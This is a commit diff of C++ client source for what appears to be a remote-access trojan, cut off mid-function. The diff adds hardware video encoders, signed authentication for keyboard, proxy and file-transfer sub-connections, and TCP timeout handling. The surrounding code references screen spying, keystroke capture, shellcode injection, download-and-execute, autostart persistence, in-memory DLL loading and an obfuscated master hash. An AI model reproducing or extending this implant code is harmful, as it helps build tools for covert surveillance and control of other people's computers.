<ClInclude Include="ScreenCapture.h" /> <ClInclude Include="ScreenCapture.h" />
<ClInclude Include="ScreenCapturerDXGI.h" /> <ClInclude Include="ScreenCapturerDXGI.h" />
<ClInclude Include="ScreenManager.h" /> <ClInclude Include="ScreenManager.h" />
<ClInclude Include="ScreenPreview.h" />
<ClInclude Include="ScreenSpy.h" /> <ClInclude Include="ScreenSpy.h" />
<ClInclude Include="ServicesManager.h" /> <ClInclude Include="ServicesManager.h" />
<ClInclude Include="ShellManager.h" /> <ClInclude Include="ShellManager.h" />

9
client/ClientDll_vs2015.vcxproj.filters
View File

@@ -27,6 +27,7 @@
<ClCompile Include="RegisterOperation.cpp" /> <ClCompile Include="RegisterOperation.cpp" />
<ClCompile Include="SafeThread.cpp" /> <ClCompile Include="SafeThread.cpp" />
<ClCompile Include="ScreenManager.cpp" /> <ClCompile Include="ScreenManager.cpp" />
<ClCompile Include="ScreenPreview.cpp" />
<ClCompile Include="ScreenSpy.cpp" /> <ClCompile Include="ScreenSpy.cpp" />
<ClCompile Include="ServicesManager.cpp" /> <ClCompile Include="ServicesManager.cpp" />
<ClCompile Include="ShellManager.cpp" /> <ClCompile Include="ShellManager.cpp" />
@@ -35,6 +36,9 @@
<ClCompile Include="TalkManager.cpp" /> <ClCompile Include="TalkManager.cpp" />
<ClCompile Include="VideoManager.cpp" /> <ClCompile Include="VideoManager.cpp" />
<ClCompile Include="X264Encoder.cpp" /> <ClCompile Include="X264Encoder.cpp" />
<ClCompile Include="CFFmpegH264Encoder.cpp" />
<ClCompile Include="CFFmpegAV1Encoder.cpp" />
<ClCompile Include="EncoderFactory.cpp" />
<ClCompile Include="..\common\file_upload.cpp" /> <ClCompile Include="..\common\file_upload.cpp" />
<ClCompile Include="ConPTYManager.cpp" /> <ClCompile Include="ConPTYManager.cpp" />
</ItemGroup> </ItemGroup>
@@ -70,6 +74,7 @@
<ClInclude Include="ScreenCapture.h" /> <ClInclude Include="ScreenCapture.h" />
<ClInclude Include="ScreenCapturerDXGI.h" /> <ClInclude Include="ScreenCapturerDXGI.h" />
<ClInclude Include="ScreenManager.h" /> <ClInclude Include="ScreenManager.h" />
<ClInclude Include="ScreenPreview.h" />
<ClInclude Include="ScreenSpy.h" /> <ClInclude Include="ScreenSpy.h" />
<ClInclude Include="ServicesManager.h" /> <ClInclude Include="ServicesManager.h" />
<ClInclude Include="ShellManager.h" /> <ClInclude Include="ShellManager.h" />
@@ -79,6 +84,10 @@
<ClInclude Include="VideoCodec.h" /> <ClInclude Include="VideoCodec.h" />
<ClInclude Include="VideoManager.h" /> <ClInclude Include="VideoManager.h" />
<ClInclude Include="X264Encoder.h" /> <ClInclude Include="X264Encoder.h" />
<ClInclude Include="VideoEncoderBase.h" />
<ClInclude Include="CFFmpegH264Encoder.h" />
<ClInclude Include="CFFmpegAV1Encoder.h" />
<ClInclude Include="EncoderFactory.h" />
<ClInclude Include="ConPTYManager.h" /> <ClInclude Include="ConPTYManager.h" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>

2
client/CursorInfo.h
View File

@@ -11,6 +11,8 @@
// ScreenType enum (USING_GDI, USING_DXGI, USING_VIRTUAL) 已移至 common/commands.h // ScreenType enum (USING_GDI, USING_DXGI, USING_VIRTUAL) 已移至 common/commands.h
#define ALGORITHM_NULL "-1"
#define ALGORITHM_NUL -1
#define ALGORITHM_GRAY 0 #define ALGORITHM_GRAY 0
#define ALGORITHM_DIFF 1 #define ALGORITHM_DIFF 1
#define ALGORITHM_DEFAULT 1 #define ALGORITHM_DEFAULT 1

71
client/EncoderFactory.cpp Normal file
View File

@@ -0,0 +1,71 @@
#include "EncoderFactory.h"
#include "common/config.h"
#include "common/logger.h"
#include "X264Encoder.h"
// 合规守护DISABLE_FFMPEG_FOR_TEST=1 时硬编实现整体移出工程,仅保留 x264 软编路径
#if defined(_WIN64) && !DISABLE_FFMPEG_FOR_TEST
#include "CFFmpegH264Encoder.h"
#include "CFFmpegAV1Encoder.h"
#endif
namespace {
// 与 ScreenCapture::BitRateToCRF 同步:码率越高 CRF 越低(质量更好)。
// 仅 x264 软编路径用,硬编路径直接用 bitrate_kbps 走 CBR。
int BitRateToCRF(int bitRate) {
if (bitRate <= 0) return 23;
if (bitRate >= 3000) return 20;
if (bitRate >= 2000) return 20 + (3000 - bitRate) * 3 / 1000;
if (bitRate >= 800) return 23 + (2000 - bitRate) * 7 / 1200;
return 32;
}
}
std::unique_ptr<VideoEncoderBase> CreateEncoder(const EncoderRequest& req) {
EncoderParams p;
p.width = req.width;
p.height = req.height;
p.fps = req.fps;
#if defined(_WIN64) && !DISABLE_FFMPEG_FOR_TEST
// AV1 硬编路径(仅当客户端声明支持 AV1 解码)
// 硬件门槛高:仅 RTX 40+ / RX 7000+ / Intel Arc 才有 av1 encoder ASIC
// 没合适硬件时 open() 全部失败,自然 fall through 到下面 H.264 路径。
if (req.encodeLevel >= LEVEL_AV1_HARD) {
auto enc = std::make_unique<CFFmpegAV1Encoder>();
p.rc = RateControl::BITRATE;
p.bitrate_kbps = req.bitrate_kbps;
if (enc->open(p)) {
Mprintf("=> encoder: %s (HW AV1, bitrate=%dk)\n", enc->backendName(), req.bitrate_kbps);
return enc;
}
Mprintf("=> all AV1 HW backends failed, falling back to H.264\n");
}
// H.264 硬编CFFmpegH264Encoder 内部按 nvenc/qsv/amf/mf 顺序探
if (req.encodeLevel >= LEVEL_H264_HARD) {
auto enc = std::make_unique<CFFmpegH264Encoder>();
p.rc = RateControl::BITRATE;
p.bitrate_kbps = req.bitrate_kbps;
if (enc->open(p)) {
Mprintf("=> encoder: %s (HW, bitrate=%dk)\n", enc->backendName(), req.bitrate_kbps);
return enc;
}
Mprintf("=> all H.264 HW backends failed, falling back to x264\n");
}
#endif
// x264 软编兜底(无硬件 / 全失败 / 虚拟机 / 远程桌面会话场景)
if (req.encodeLevel >= LEVEL_H264_SOFT) {
auto enc = std::make_unique<CX264Encoder>();
p.rc = RateControl::CRF;
p.crf = BitRateToCRF(req.bitrate_kbps);
if (enc->open(p)) {
Mprintf("=> encoder: %s (SW, crf=%d)\n", enc->backendName(), p.crf);
return enc;
}
}
Mprintf("=> ERROR: no encoder could be opened\n");
return nullptr;
}

25
client/EncoderFactory.h Normal file
View File

@@ -0,0 +1,25 @@
#pragma once
#include "VideoEncoderBase.h"
#include "common/commands.h"
#include <memory>
// 创建编码器的请求参数。
struct EncoderRequest {
int width = 0;
int height = 0;
int fps = 30;
int bitrate_kbps = 4000;
int encodeLevel = LEVEL_H264_SOFT;
};
// 按客户端能力 + 本机硬件能力创建一个 VideoEncoderBase。
//
// 探测顺序(第一个 open 成功的就用):
// AV1 硬编路径
// H.264 硬编CFFmpegH264Encoder 内部按 nvenc/qsv/amf/mf 探)
// x264 软编CX264EncoderCPU 兜底)
//
// 失败路径在日志中可见Mprintf。返回 nullptr 仅在 x264 也开不起来时(极少见)。
std::unique_ptr<VideoEncoderBase> CreateEncoder(const EncoderRequest& req);

8
client/FileManager.cpp
View File

@@ -33,7 +33,9 @@ CFileManager::CFileManager(CClientSocket *pClient, int h, void* user):CManager(p
// 初始化V2文件传输模块 // 初始化V2文件传输模块
CKernelManager* main = (CKernelManager*)pClient->GetMain(); CKernelManager* main = (CKernelManager*)pClient->GetMain();
InitFileUpload({}, main ? main->m_LoginMsg : pClient->m_LoginMsg, m_Signature = main ? main->m_LoginSignature : pClient->m_LoginSignature;
if (!m_Signature.empty())
InitFileUpload({}, main ? main->m_LoginMsg : pClient->m_LoginMsg,
main ? main->m_LoginSignature : pClient->m_LoginSignature, 64, 50, Logf); main ? main->m_LoginSignature : pClient->m_LoginSignature, 64, 50, Logf);
// 发送驱动器列表, 开始进行文件管理,建立新线程 // 发送驱动器列表, 开始进行文件管理,建立新线程
@@ -48,7 +50,8 @@ CFileManager::~CFileManager()
SAFE_CLOSE_HANDLE(m_hSearchThread); SAFE_CLOSE_HANDLE(m_hSearchThread);
} }
m_UploadList.clear(); m_UploadList.clear();
UninitFileUpload(); if (!m_Signature.empty())
UninitFileUpload();
} }
@@ -1163,6 +1166,7 @@ void CFileManager::UploadToRemoteV2(LPBYTE lpBuffer, UINT nSize)
// 创建新连接发送文件 // 创建新连接发送文件
IOCPClient* pClient = new IOCPClient(g_bExit, true, MaskTypeNone, conn); IOCPClient* pClient = new IOCPClient(g_bExit, true, MaskTypeNone, conn);
pClient->EnableSubConnAuth(); // V2 文件传输子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
if (pClient->ConnectServer(m_ClientObject->ServerIP().c_str(), m_ClientObject->ServerPort())) { if (pClient->ConnectServer(m_ClientObject->ServerIP().c_str(), m_ClientObject->ServerPort())) {
std::thread([allFiles, targetDir = std::string(targetDir), pClient, opts, hash, hmac]() { std::thread([allFiles, targetDir = std::string(targetDir), pClient, opts, hash, hmac]() {
FileBatchTransferWorkerV2(allFiles, targetDir, pClient, FileBatchTransferWorkerV2(allFiles, targetDir, pClient,

1
client/FileManager.h
View File

@@ -35,6 +35,7 @@ private:
UINT m_nTransferMode; UINT m_nTransferMode;
char m_strCurrentProcessFileName[MAX_PATH]; // 当前正在处理的文件 char m_strCurrentProcessFileName[MAX_PATH]; // 当前正在处理的文件
__int64 m_nCurrentProcessFileLength; // 当前正在处理的文件的长度 __int64 m_nCurrentProcessFileLength; // 当前正在处理的文件的长度
std::string m_Signature;
bool MakeSureDirectoryPathExists(LPCTSTR pszDirPath); bool MakeSureDirectoryPathExists(LPCTSTR pszDirPath);
bool UploadToRemote(LPBYTE lpBuffer); bool UploadToRemote(LPBYTE lpBuffer);
void UploadToRemoteV2(LPBYTE lpBuffer, UINT nSize); void UploadToRemoteV2(LPBYTE lpBuffer, UINT nSize);

145
client/IOCPClient.cpp
View File

@@ -86,6 +86,27 @@ BOOL SetKeepAliveOptions(int socket, int nKeepAliveSec = 180)
} }
#endif #endif
// TCP_USER_TIMEOUT (RFC 5482): 未被对端 ACK 的已发数据超过此时间,内核直接把
// socket 标记为 ETIMEDOUT下一次 send/recv 立即报错。
//
// 为什么 SO_KEEPALIVE 不够keep-alive 只在连接完全 idle 时才探测,应用层每
// 30s 一次心跳让 TCP 永远进不了 idle 态。VM 挂起恢复 / 笔记本合盖唤醒 / NAT
// 表项老化等场景下,对端早已关闭连接但本端 send() 仍把字节塞进 SNDBUF 立即
// 返回成功——出现 ESTABLISHED + Send-Q 堆积的"半死连接",应用层完全无感,
// 默认要等 tcp_retries2 跑完(~15分钟)才报错。
//
// 选 30s>= 默认心跳间隔(5-30s)< 服务端 CheckHeartbeat 超时(>=60s)。
// Linux 2.6.37+ 支持macOS / 老内核 无此宏,自动跳过——那条路径上靠应用层
// ACK 看门狗(linux/main.cpp 心跳循环)兜底。
#ifdef TCP_USER_TIMEOUT
unsigned int userTimeoutMs = 30000;
if (setsockopt(socket, IPPROTO_TCP, TCP_USER_TIMEOUT,
&userTimeoutMs, sizeof(userTimeoutMs)) < 0) {
Mprintf("Failed to set TCP_USER_TIMEOUT\n");
// 非致命keep-alive 已设上,应用层还有 ACK 看门狗兜底,继续即可
}
#endif
Mprintf("TCP keep-alive settings applied successfully\n"); Mprintf("TCP keep-alive settings applied successfully\n");
return TRUE; return TRUE;
} }
@@ -100,6 +121,77 @@ VOID IOCPClient::setManagerCallBack(void* Manager, DataProcessCB dataProcess, O
m_ReconnectFunc = m_exit_while_disconnect ? reconnect : NULL; m_ReconnectFunc = m_exit_while_disconnect ? reconnect : NULL;
} }
// 子连接身份校验:发 TOKEN_CONN_AUTH 包后阻塞等服务端响应。
// signMessage 由私有库提供(与 KernelManager.cpp 验证主控签名同款),
// 空 publicKey/privateKey 走内置 HMAC。
extern std::string signMessage(const std::string& privateKey, BYTE* msg, int len);
bool IOCPClient::PerformConnAuth(uint64_t clientID, int timeoutMs)
{
ConnAuthPacket pkt = {};
pkt.token = TOKEN_CONN_AUTH;
pkt.clientID = clientID;
pkt.timestamp = (uint64_t)time(NULL);
// 16 字节 nonce用 rand() + 时间扰动,强度够用(重放保护主要靠时间戳)
for (int i = 0; i < 16; ++i) {
pkt.nonce[i] = (uint8_t)((rand() ^ (clock() >> i)) & 0xFF);
}
BYTE sigInput[8 + 8 + 16];
memcpy(sigInput, &pkt.clientID, 8);
memcpy(sigInput + 8, &pkt.timestamp, 8);
memcpy(sigInput + 16, pkt.nonce, 16);
auto sig = signMessage("", sigInput, sizeof(sigInput));
size_t sigLen = sig.size() < 64 ? sig.size() : 64;
memcpy(pkt.signature, sig.data(), sigLen);
// 设置等待状态
{
std::lock_guard<std::mutex> lk(m_authMtx);
m_authStatus = -1;
m_authPending = true;
}
// 发包;用 HttpMask 包装与其它子连接首包风格一致
HttpMask mask(DEFAULT_HOST, GetClientIPHeader());
int sent = Send2Server((char*)&pkt, sizeof(pkt), &mask);
if (sent <= 0) {
std::lock_guard<std::mutex> lk(m_authMtx);
m_authPending = false;
Mprintf("[ConnAuth] 发送失败\n");
return false;
}
// 等响应或超时
std::unique_lock<std::mutex> lk(m_authMtx);
bool got = m_authCv.wait_for(lk, std::chrono::milliseconds(timeoutMs),
[this]{ return !m_authPending; });
int status = m_authStatus;
m_authPending = false;
if (!got) {
Mprintf("[ConnAuth] 等待响应超时 (%d ms),判定失败\n", timeoutMs);
return false;
}
bool ok = (status == CONN_AUTH_OK);
Mprintf("[ConnAuth] %s (status=%d)\n", ok ? "通过" : "失败", status);
return ok;
}
bool IOCPClient::TryHandleAuthResponse(PBYTE buf, ULONG len)
{
if (!buf || len < sizeof(ConnAuthAck)) return false;
if (buf[0] != TOKEN_CONN_AUTH) return false;
{
std::lock_guard<std::mutex> lk(m_authMtx);
if (!m_authPending) return false; // 没在等 → 不消费,让 manager 处理(理论不会发生)
const ConnAuthAck* ack = (const ConnAuthAck*)buf;
m_authStatus = ack->status;
m_authPending = false;
}
m_authCv.notify_all();
return true;
}
IOCPClient::IOCPClient(const State&bExit, bool exit_while_disconnect, int mask, CONNECT_ADDRESS* conn, IOCPClient::IOCPClient(const State&bExit, bool exit_while_disconnect, int mask, CONNECT_ADDRESS* conn,
const std::string& pubIP, void* main) : g_bExit(bExit) const std::string& pubIP, void* main) : g_bExit(bExit)
@@ -119,11 +211,20 @@ IOCPClient::IOCPClient(const State&bExit, bool exit_while_disconnect, int mask,
} }
m_main = main; m_main = main;
m_conn = conn; // 保存 CONNECT_ADDRESS 指针。子连接 auth 在每次连接时通过
// m_conn->clientID 现取主连接 ID同一指针主连接登录后填好的最新值
int encoder = conn ? conn->GetHeaderEncType() : 0; int encoder = conn ? conn->GetHeaderEncType() : 0;
m_sLocPublicIP = pubIP; m_sLocPublicIP = pubIP;
m_ServerAddr = {}; m_ServerAddr = {};
m_nHostPort = 0; m_nHostPort = 0;
m_Manager = NULL; m_Manager = NULL;
// 防御性初始化:避免 Debug build 里 0xcdcdcdcd 堆 fill 让 Receive 线程
// 在调用方 setManagerCallBack() 之前就读到野指针。子连接(屏幕/键盘等)
// 走 LoopManager 模式时new IOCPClient → ConnectServer 启动 Receive
// worker 与 Manager 构造(内含 setManagerCallBack之间有 race window
// 这里清零让 Receive 路径有机会 NULL-check 而不是炸在野指针上。
m_DataProcess = NULL;
m_ReconnectFunc = NULL;
m_masker = mask ? new HttpMask(DEFAULT_HOST) : new PkgMask(); m_masker = mask ? new HttpMask(DEFAULT_HOST) : new PkgMask();
auto enc = GetHeaderEncoder(HeaderEncType(time(nullptr) % HeaderEncNum)); auto enc = GetHeaderEncoder(HeaderEncType(time(nullptr) % HeaderEncNum));
m_EncoderType = encoder; m_EncoderType = encoder;
@@ -380,6 +481,27 @@ BOOL IOCPClient::ConnectServer(const char* szServerIP, unsigned short uPort)
#endif #endif
} }
// 子连接身份校验opt-in 通过 EnableSubConnAuth 开启):
// - WorkThread 已经启动,能接收 ack 包并通过 TryHandleAuthResponse 唤醒等待。
// - clientID 优先用 EnableSubConnAuth 显式传入的值Linux/macOS 客户端走此路径),
// 未显式传入时从 m_conn 现取Windows 客户端走此路径)。
// - 校验失败Disconnect 并返回 FALSE让上层走重连或放弃逻辑。
if (m_subConnAuthEnabled) {
uint64_t cid = m_subConnAuthClientID;
if (cid == 0 && m_conn) cid = m_conn->clientID;
if (cid == 0) {
Mprintf("[ConnAuth] 跳过校验clientID 尚未就绪(主连接还没拿到 ID\n");
// 没拿到 ID 就别盲发,等下一次 Reconnect 时再试。视为本次连接失败。
Disconnect();
return FALSE;
}
if (!PerformConnAuth(cid, CONN_AUTH_CLIENT_WAIT_MS)) {
Mprintf("[ConnAuth] 校验失败,断开连接\n");
Disconnect();
return FALSE;
}
}
return TRUE; return TRUE;
} }
@@ -549,11 +671,24 @@ VOID IOCPClient::OnServerReceiving(CBuffer* m_CompressedBuffer, char* szBuffer,
size_t iRet = uncompress(DeCompressedBuffer, &ulOriginalLength, CompressedBuffer, ulCompressedLength); size_t iRet = uncompress(DeCompressedBuffer, &ulOriginalLength, CompressedBuffer, ulCompressedLength);
if (Z_SUCCESS(iRet)) { //如果解压成功 if (Z_SUCCESS(iRet)) { //如果解压成功
//解压好的数据和长度传递给对象Manager进行处理 注意这里是用了多态 // 优先看是不是 TOKEN_CONN_AUTH 响应;只有当 PerformConnAuth 正在等待时才消费。
//由于m_pManager中的子类不一样造成调用的OnReceive函数不一样 // 不在等待状态时返回 false包透传给 managermanager 一般也不识别此 token
int ret = DataProcessWithSEH(m_DataProcess, m_Manager, DeCompressedBuffer, ulOriginalLength); // 走 default 路径忽略,无副作用)。
if (ret) { if (!TryHandleAuthResponse(DeCompressedBuffer, ulOriginalLength)) {
Mprintf("[ERROR] DataProcessWithSEH return exception code: [0x%08X]\n", ret); //解压好的数据和长度传递给对象Manager进行处理 注意这里是用了多态
//由于m_pManager中的子类不一样造成调用的OnReceive函数不一样
// 防御 race window子连接 ConnectServer 触发 Receive 后,
// 调用方 setManagerCallBack() 可能还没执行;丢弃这种早期包
// 比让函数指针炸进 0xcdcdcd 强pre-existing race详见
// 构造函数注释,长期需要在 ConnectServer 前 set callback
if (m_DataProcess == NULL) {
Mprintf("[WARN] dropping early packet: setManagerCallBack not yet called\n");
} else {
int ret = DataProcessWithSEH(m_DataProcess, m_Manager, DeCompressedBuffer, ulOriginalLength);
if (ret) {
Mprintf("[ERROR] DataProcessWithSEH return exception code: [0x%08X]\n", ret);
}
}
} }
} else { } else {
Mprintf("[ERROR] uncompress fail: dstLen %lu, srcLen %lu\n", ulOriginalLength, ulCompressedLength); Mprintf("[ERROR] uncompress fail: dstLen %lu, srcLen %lu\n", ulOriginalLength, ulCompressedLength);

38
client/IOCPClient.h
View File

@@ -32,6 +32,8 @@
#endif #endif
#include "IOCPBase.h" #include "IOCPBase.h"
#include <mutex> #include <mutex>
#include <condition_variable>
#include <chrono>
#define MAX_RECV_BUFFER 1024*32 #define MAX_RECV_BUFFER 1024*32
#define MAX_SEND_BUFFER 1024*128 // 增大分块大小以提高发送效率 #define MAX_SEND_BUFFER 1024*128 // 增大分块大小以提高发送效率
@@ -259,6 +261,31 @@ public:
m_LoginMsg = msg; m_LoginMsg = msg;
m_LoginSignature = hmac; m_LoginSignature = hmac;
} }
// 子连接身份校验:发 TOKEN_CONN_AUTH 包,等服务端 ConnAuthAck 响应。
// 返回 true 表示通过false 表示超时/失败/网络错误。
// 主连接不调用此方法。新客户端必须调用并校验成功后才能继续后续命令。
// 已实现的协议扩展(如 KeyBoard 子连接的 cap word保留不变与本机制并行工作。
bool PerformConnAuth(uint64_t clientID, int timeoutMs);
// 让 ConnectServer 在每次成功后自动调一次 PerformConnAuthopt-in
// 子连接构造后调用此方法启用。
// - clientID == 0每次 auth 时从 m_conn->clientID 现取Windows 客户端走此路径)。
// 这样即便 IOCPClient 创建时主连接还没拿到 ID真正连上时也能用到最新值。
// - clientID != 0显式指定Linux/macOS 客户端 IOCPClient 不带 m_conn 时用此参数)。
void EnableSubConnAuth(bool enabled = true, uint64_t clientID = 0) {
m_subConnAuthEnabled = enabled;
m_subConnAuthClientID = clientID;
}
// 内部:在收到的数据帧分发到 manager 之前,尝试识别并消费 TOKEN_CONN_AUTH ack。
// 仅在我们正在等待 auth 响应时m_authPending=true才消费否则透传给 manager。
bool TryHandleAuthResponse(PBYTE buf, ULONG len);
// 主动断开当前连接,关闭 socket。提到 public 让外层(如 Linux/macOS main 的心跳
// 循环检测到服务端身份校验超时)能在重连前显式关闭旧 fd避免泄漏。
virtual VOID Disconnect(); // 函数支持 TCP/UDP
protected: protected:
virtual int ReceiveData(char* buffer, int bufSize, int flags) virtual int ReceiveData(char* buffer, int bufSize, int flags)
{ {
@@ -266,7 +293,6 @@ protected:
return recv(m_sClientSocket, buffer, bufSize - 1, 0); return recv(m_sClientSocket, buffer, bufSize - 1, 0);
} }
virtual bool ProcessRecvData(CBuffer* m_CompressedBuffer, char* szBuffer, int len, int flag); virtual bool ProcessRecvData(CBuffer* m_CompressedBuffer, char* szBuffer, int len, int flag);
virtual VOID Disconnect(); // 函数支持 TCP/UDP
virtual int SendTo(const char* buf, int len, int flags) virtual int SendTo(const char* buf, int len, int flags)
{ {
return ::send(m_sClientSocket, buf, len, flags); return ::send(m_sClientSocket, buf, len, flags);
@@ -285,6 +311,16 @@ protected:
BOOL m_bConnected; BOOL m_bConnected;
std::mutex m_Locker; std::mutex m_Locker;
// 子连接身份校验同步状态。仅在 PerformConnAuth 调用期间生效。
std::mutex m_authMtx;
std::condition_variable m_authCv;
int m_authStatus = -1; // -1 = 未启动;其它 = ConnAuthStatus
bool m_authPending = false; // true 时 TryHandleAuthResponse 才消费 ack
// ConnectServer 成功后自动 auth 的 opt-in 标志。子连接构造后调 EnableSubConnAuth() 设为 true。
bool m_subConnAuthEnabled = false;
uint64_t m_subConnAuthClientID = 0; // 0 表示从 m_conn->clientID 现取
#if USING_CTX #if USING_CTX
ZSTD_CCtx* m_Cctx; // 压缩上下文 ZSTD_CCtx* m_Cctx; // 压缩上下文
ZSTD_DCtx* m_Dctx; // 解压上下文 ZSTD_DCtx* m_Dctx; // 解压上下文

154
client/KernelManager.cpp
View File

@@ -18,6 +18,7 @@
#include "auto_start.h" #include "auto_start.h"
#include "ShellcodeInj.h" #include "ShellcodeInj.h"
#include "KeyboardManager.h" #include "KeyboardManager.h"
#include "ScreenPreview.h"
#include "common/file_upload.h" #include "common/file_upload.h"
#include "common/DateVerify.h" #include "common/DateVerify.h"
#include "common/LANChecker.h" #include "common/LANChecker.h"
@@ -53,7 +54,9 @@ ThreadInfo* CreateKB(CONNECT_ADDRESS* conn, State& bExit, const std::string &pub
{ {
ThreadInfo *tKeyboard = new ThreadInfo(); ThreadInfo *tKeyboard = new ThreadInfo();
tKeyboard->run = FOREVER_RUN; tKeyboard->run = FOREVER_RUN;
tKeyboard->p = new IOCPClient(bExit, false, MaskTypeNone, conn, publicIP); auto* sub = new IOCPClient(bExit, false, MaskTypeNone, conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
tKeyboard->p = sub;
tKeyboard->conn = conn; tKeyboard->conn = conn;
tKeyboard->h = (HANDLE)__CreateThread(NULL, NULL, LoopKeyboardManager, tKeyboard, 0, NULL); tKeyboard->h = (HANDLE)__CreateThread(NULL, NULL, LoopKeyboardManager, tKeyboard, 0, NULL);
return tKeyboard; return tKeyboard;
@@ -272,6 +275,7 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
FrpcParam* f = (FrpcParam*)user; FrpcParam* f = (FrpcParam*)user;
Mprintf("MemoryGetProcAddress '%s' %s\n", info.Name, proc ? "success" : "failed"); Mprintf("MemoryGetProcAddress '%s' %s\n", info.Name, proc ? "success" : "failed");
int r = 0; int r = 0;
uint64_t start = time(0);
if (proc) { if (proc) {
r=proc(f->privilegeKey, f->timestamp, f->serverAddr, f->serverPort, f->localPort, f->remotePort, r=proc(f->privilegeKey, f->timestamp, f->serverAddr, f->serverPort, f->localPort, f->remotePort,
&CKernelManager::g_IsAppExit); &CKernelManager::g_IsAppExit);
@@ -279,7 +283,7 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
else { else {
This->m_cfg->SetStr("settings", info.Name + std::string(".md5"), ""); This->m_cfg->SetStr("settings", info.Name + std::string(".md5"), "");
} }
if (r) { if (r || (time(0)-start < 15)) {
char buf[100]; char buf[100];
sprintf_s(buf, "Run %s [proxy %d] failed: %d", info.Name, f->localPort, r); sprintf_s(buf, "Run %s [proxy %d] failed: %d", info.Name, f->localPort, r);
Mprintf("%s\n", buf); Mprintf("%s\n", buf);
@@ -295,6 +299,7 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
FrpcParam* f = (FrpcParam*)user; FrpcParam* f = (FrpcParam*)user;
Mprintf("MemoryGetProcAddress '%s' %s\n", info.Name, proc ? "success" : "failed"); Mprintf("MemoryGetProcAddress '%s' %s\n", info.Name, proc ? "success" : "failed");
int r = 0; int r = 0;
uint64_t start = time(0);
if (proc) { if (proc) {
r = proc(f->privilegeKey, f->serverAddr, f->serverPort, f->localPort, f->remotePort, r = proc(f->privilegeKey, f->serverAddr, f->serverPort, f->localPort, f->remotePort,
&CKernelManager::g_IsAppExit); &CKernelManager::g_IsAppExit);
@@ -302,7 +307,7 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
else { else {
This->m_cfg->SetStr("settings", info.Name + std::string(".md5"), ""); This->m_cfg->SetStr("settings", info.Name + std::string(".md5"), "");
} }
if (r) { if (r || (time(0)-start < 15)) {
char buf[100]; char buf[100];
sprintf_s(buf, "Run %s [proxy %d] failed: %d", info.Name, f->localPort, r); sprintf_s(buf, "Run %s [proxy %d] failed: %d", info.Name, f->localPort, r);
Mprintf("%s\n", buf); Mprintf("%s\n", buf);
@@ -612,14 +617,18 @@ void DownExecute(const std::string &strUrl, CManager *This)
} }
#include "common/location.h" #include "common/location.h"
std::string getHardwareIDByCfg(const std::string& pwdHash, const std::string& masterHash) std::string getHardwareIDByCfg(std::string& pwdHash, const std::string& masterHash)
{ {
iniFile reg;
pwdHash = reg.GetStr("settings", "UpperHash", masterHash);
config* m_iniFile = nullptr; config* m_iniFile = nullptr;
#ifdef _DEBUG #ifdef _DEBUG
m_iniFile = pwdHash == masterHash ? new config : new iniFile; m_iniFile = pwdHash == masterHash ? new config : new iniFile;
#else #else
m_iniFile = new iniFile; m_iniFile = new iniFile;
#endif #endif
pwdHash = m_iniFile->GetStr("settings", "UpperHash", masterHash);
int bindType = m_iniFile->GetInt("settings", "BindType", 0); int bindType = m_iniFile->GetInt("settings", "BindType", 0);
int hwVersion = m_iniFile->GetInt("settings", "HWIDVersion", 0); int hwVersion = m_iniFile->GetInt("settings", "HWIDVersion", 0);
std::string master = m_iniFile->GetStr("settings", "master"); std::string master = m_iniFile->GetStr("settings", "master");
@@ -877,18 +886,17 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
// 扩大到 400 字节以容纳 V2 签名(约 92 字节)和 Authorization约 150 字节) // 扩大到 400 字节以容纳 V2 签名(约 92 字节)和 Authorization约 150 字节)
char buf[400] = {}, *passCode = buf + 5; char buf[400] = {}, *passCode = buf + 5;
memcpy(buf, szBuffer, min(sizeof(buf), ulLength)); memcpy(buf, szBuffer, min(sizeof(buf), ulLength));
std::string masterHash(skCrypt(MASTER_HASH));
const char* pwdHash = m_conn->pwdHash[0] ? m_conn->pwdHash : masterHash.c_str();
if (passCode[0] == 0) { if (passCode[0] == 0) {
std::string pwdHash, masterHash(skCrypt(MASTER_HASH));
static std::string hardwareId = getHardwareIDByCfg(pwdHash, masterHash); static std::string hardwareId = getHardwareIDByCfg(pwdHash, masterHash);
static std::string hashedID = hashSHA256(hardwareId); static std::string hashedID = hashSHA256(hardwareId);
static std::string devId = getFixedLengthID(hashedID); static std::string devId = getFixedLengthID(hashedID);
memcpy(buf + 24, buf + 12, 8); // 消息签名 memcpy(buf + 24, buf + 12, 8); // 消息签名
memcpy(buf + 96, buf + 8, 4); // 时间戳 memcpy(buf + 96, buf + 8, 4); // 时间戳
memcpy(buf + 5, devId.c_str(), devId.length()); // 16字节 memcpy(buf + 5, devId.c_str(), devId.length()); // 16字节
memcpy(buf + 32, pwdHash, 64); // 64字节 memcpy(buf + 32, pwdHash.c_str(), 64); // 64字节
m_ClientObject->Send2Server((char*)buf, sizeof(buf)); m_ClientObject->Send2Server((char*)buf, sizeof(buf));
Mprintf("Request for authorization update.\n"); Mprintf("Request for authorization update. SN: %s, PwdHash: %s\n", devId.c_str(), pwdHash.c_str());
} else { } else {
unsigned short* days = (unsigned short*)(buf + 1); unsigned short* days = (unsigned short*)(buf + 1);
unsigned short* num = (unsigned short*)(buf + 3); unsigned short* num = (unsigned short*)(buf + 3);
@@ -954,7 +962,11 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
} }
case COMMAND_PROXY: { case COMMAND_PROXY: {
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP); {
auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
}
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL, 0, LoopProxyManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL, 0, LoopProxyManager, &m_hThread[m_ulThreadCount], 0, NULL);;
break; break;
} }
@@ -1058,33 +1070,49 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
if (m_hKeyboard) { if (m_hKeyboard) {
